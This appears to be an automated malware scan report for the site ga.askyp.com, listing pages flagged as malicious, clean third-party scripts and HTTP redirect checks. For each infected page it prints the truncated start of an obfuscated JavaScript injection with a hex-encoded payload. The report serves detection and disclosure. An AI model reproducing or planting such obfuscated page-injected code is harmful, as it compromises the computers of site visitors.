Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ga.askyp.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://ga.askyp.com/ | 200 OK Content-Length: 23202 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pbqtuw=\"s\"+\"p\"+\"li\"+\"t\";uhlsoi=window;tohg=\"dy\";anfgwa=document;mcb=\"0x\";eoqyd=(5-3-1);try{++(anfgwa.body)}catch(uqdbl){ienddh=false;try{}catch(pqnnj){ienddh=21;}if(1){oonriq=\"17:5d:6c:65:5a:6b:60:66:65:17:5f:70:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5f:70:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69: ...[3940 bytes skipped]... Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19492 Content-Type: text/javascript | clean |
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en | 200 OK Content-Length: 2512 Content-Type: text/javascript | clean |
http://tags.expo9.exponential.com/tags/AskYP/ROS/tags.js | 200 OK Content-Length: 57710 Content-Type: application/x-javascript | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://edge.quantserve.com/quant.js | 200 OK Content-Length: 7874 Content-Type: application/x-javascript | clean |
http://www5.addfreestats.com/cgi-bin/afstrack.cgi?usr=00530625 | 200 OK Content-Length: 3239 Content-Type: application/x-javascript | clean |
http://ga.askyp.com/a.html | 200 OK Content-Length: 23790 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pbqtuw=\"s\"+\"p\"+\"li\"+\"t\";uhlsoi=window;tohg=\"dy\";anfgwa=document;mcb=\"0x\";eoqyd=(5-3-1);try{++(anfgwa.body)}catch(uqdbl){ienddh=false;try{}catch(pqnnj){ienddh=21;}if(1){oonriq=\"17:5d:6c:65:5a:6b:60:66:65:17:5f:70:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5f:70:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69: ...[3940 bytes skipped]... Antivirus reports:
| ||
http://ga.askyp.com/b.html | 200 OK Content-Length: 24356 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pbqtuw=\"s\"+\"p\"+\"li\"+\"t\";uhlsoi=window;tohg=\"dy\";anfgwa=document;mcb=\"0x\";eoqyd=(5-3-1);try{++(anfgwa.body)}catch(uqdbl){ienddh=false;try{}catch(pqnnj){ienddh=21;}if(1){oonriq=\"17:5d:6c:65:5a:6b:60:66:65:17:5f:70:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5f:70:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5 ...[3939 bytes skipped]... Antivirus reports:
| ||
http://ga.askyp.com/c.html | 200 OK Content-Length: 26607 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pbqtuw=\"s\"+\"p\"+\"li\"+\"t\";uhlsoi=window;tohg=\"dy\";anfgwa=document;mcb=\"0x\";eoqyd=(5-3-1);try{++(anfgwa.body)}catch(uqdbl){ienddh=false;try{}catch(pqnnj){ienddh=21;}if(1){oonriq=\"17:5d:6c:65:5a:6b:60:66:65:17:5f:70:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5f:70:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69: ...[3940 bytes skipped]... Antivirus reports:
| ||
http://ga.askyp.com/d.html | 200 OK Content-Length: 22662 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pbqtuw=\"s\"+\"p\"+\"li\"+\"t\";uhlsoi=window;tohg=\"dy\";anfgwa=document;mcb=\"0x\";eoqyd=(5-3-1);try{++(anfgwa.body)}catch(uqdbl){ienddh=false;try{}catch(pqnnj){ienddh=21;}if(1){oonriq=\"17:5d:6c:65:5a:6b:60:66:65:17:5f:70:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5f:70:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69: ...[3940 bytes skipped]... Antivirus reports:
| ||
http://ga.askyp.com/e.html | 200 OK Content-Length: 21018 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pbqtuw=\"s\"+\"p\"+\"li\"+\"t\";uhlsoi=window;tohg=\"dy\";anfgwa=document;mcb=\"0x\";eoqyd=(5-3-1);try{++(anfgwa.body)}catch(uqdbl){ienddh=false;try{}catch(pqnnj){ienddh=21;}if(1){oonriq=\"17:5d:6c:65:5a:6b:60:66:65:17:5f:70:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5f:70:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69: ...[3940 bytes skipped]... Antivirus reports:
| ||
http://ga.askyp.com/f.html | 200 OK Content-Length: 21899 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pbqtuw=\"s\"+\"p\"+\"li\"+\"t\";uhlsoi=window;tohg=\"dy\";anfgwa=document;mcb=\"0x\";eoqyd=(5-3-1);try{++(anfgwa.body)}catch(uqdbl){ienddh=false;try{}catch(pqnnj){ienddh=21;}if(1){oonriq=\"17:5d:6c:65:5a:6b:60:66:65:17:5f:70:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5f:70:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c ...[3938 bytes skipped]... Antivirus reports:
| ||
http://ga.askyp.com/g.html | 200 OK Content-Length: 20826 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pbqtuw=\"s\"+\"p\"+\"li\"+\"t\";uhlsoi=window;tohg=\"dy\";anfgwa=document;mcb=\"0x\";eoqyd=(5-3-1);try{++(anfgwa.body)}catch(uqdbl){ienddh=false;try{}catch(pqnnj){ienddh=21;}if(1){oonriq=\"17:5d:6c:65:5a:6b:60:66:65:17:5f:70:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5f:70:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c ...[3938 bytes skipped]... Antivirus reports:
| ||
http://ga.askyp.com/h.html | 200 OK Content-Length: 21792 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pbqtuw=\"s\"+\"p\"+\"li\"+\"t\";uhlsoi=window;tohg=\"dy\";anfgwa=document;mcb=\"0x\";eoqyd=(5-3-1);try{++(anfgwa.body)}catch(uqdbl){ienddh=false;try{}catch(pqnnj){ienddh=21;}if(1){oonriq=\"17:5d:6c:65:5a:6b:60:66:65:17:5f:70:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5f:70:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5 ...[3939 bytes skipped]... Antivirus reports:
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ga.askyp.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 24 Jan 2015 03:40:31 GMT
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.8
Content-Type: text/html
X-Powered-By: PHP/5.3.8
GET / HTTP/1.1
Host: ga.askyp.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 24 Jan 2015 03:40:31 GMT
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.8
Content-Type: text/html
X-Powered-By: PHP/5.3.8
Second query (visit from search engine):
GET / HTTP/1.1
Host: ga.askyp.com
Referer: http://www.google.com/search?q=ga.askyp.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ga.askyp.com
Referer: http://www.google.com/search?q=ga.askyp.com
Result:
The result is similar to the first query. There are no suspicious redirects found.